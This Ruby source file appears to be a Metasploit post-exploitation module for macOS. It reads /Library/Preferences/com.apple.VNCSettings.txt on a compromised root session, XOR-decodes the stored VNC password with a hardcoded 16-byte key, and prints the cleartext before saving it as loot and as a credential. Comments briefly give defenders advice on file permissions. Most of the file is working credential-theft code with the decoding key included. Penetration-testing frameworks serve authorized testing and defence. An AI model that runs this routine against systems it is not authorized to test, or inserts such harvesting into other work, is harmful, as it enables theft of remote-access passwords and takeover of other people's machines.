GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/osx/gather/vnc_password_osx.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
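# Post module that reads the Apple VNC settings file on an OS X session and
# decodes the password stored in it.
#
# The stored value is the password XORed with a constant key that is the same
# on every host, so the file is password-equivalent to anyone who can read it.
# The module itself requires root before reading the file. For defenders this
# means file permissions are the only protection: audit access to
# /Library/Preferences/com.apple.VNCSettings.txt and prefer disabling the
# legacy "VNC viewers may control screen with password" option where it is
# not needed.
class MetasploitModule < Msf::Post
  include Msf::Post::OSX::Priv
  include Msf::Post::File

  # Registers the module metadata (name, platform, session types, notes).
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OS X Display Apple VNC Password',
        'Description' => %q{
          This module shows Apple VNC Password from Mac OS X High Sierra.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Kevin Gonzalvo <interhack[at]gmail.com>'],
        'Platform' => [ 'osx' ],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Decodes the hex string stored in the VNC settings file.
  #
  # The value is XORed byte-for-byte with a fixed 16-byte key; this is
  # reversible obfuscation, not encryption.
  #
  # @param hash [String, nil] hex-encoded contents of the settings file
  # @return [String, nil] decoded password with NUL bytes removed, or nil when
  #   the input is empty, whitespace only, or not a hex string
  def decrypt_hash(hash)
    hex = hash.to_s.strip

    # pack('H*') silently maps non-hex characters to nibbles, which would yield
    # a garbage "password". Reject such input so the caller reports "not found"
    # instead of recording junk as a credential.
    # NOTE(review): assumes the settings file holds only hex digits - confirm.
    return unless hex.match?(/\A\h+\z/)

    fixedkey = ['1734516E8BA8C5E2FF1C39567390ADCA'].pack('H*').unpack('C*')
    stored = [hex].pack('H*').unpack('C*')

    # XOR only the positions present in the stored value. A value shorter than
    # the key used to raise TypeError (Integer ^ nil); bytes beyond the key
    # length are ignored, as before.
    decoded = stored.first(fixedkey.length).each_with_index.map do |byte, index|
      (byte ^ fixedkey[index]).chr
    end

    decoded.join.delete("\0")
  end

  # Reads the VNC settings file, decodes it, and records the result as loot
  # and as a credential tied to the current session.
  #
  # @return [void]
  def run
    unless is_root?
      fail_with(Failure::NoAccess, 'Root privileges are required to read VNC password file')
    end

    print_status('Checking VNC Password...')
    vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'
    passwd_encrypt = read_file(vncsettings_path)
    final_passwd = decrypt_hash(passwd_encrypt)

    # An empty decode (value made up only of padding) is treated like a missing
    # password, so no empty loot file or credential is created.
    if final_passwd.blank?
      print_error('Password not found')
      return
    end

    # The cleartext is written to the console, the loot directory and the
    # credential store; all three hold the recovered password from here on.
    print_good("Password Found: #{final_passwd}")
    pass_file = store_loot('osx.vnc.password', 'text/plain', session, final_passwd, 'passwd.pwd', 'OSX VNC Password')
    print_good("Password data stored as loot in: #{pass_file}")

    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: fullname,
      private_type: :password,
      private_data: final_passwd.to_s,
      workspace_id: myworkspace_id
    }
    create_credential(credential_data)
  end
end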